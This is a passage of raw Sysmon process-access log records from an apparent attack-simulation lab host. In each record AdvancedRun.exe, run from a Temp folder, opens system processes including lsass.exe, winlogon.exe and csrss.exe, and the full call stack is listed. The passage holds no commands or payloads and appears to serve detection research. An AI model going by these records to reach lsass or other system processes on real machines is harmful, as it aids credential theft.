Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004079747Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079746Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079745Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079744Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079743Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079742Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.818{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004079716Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004079715Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079714Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004079713Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079712Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004079711Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079710Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079709Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079708Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
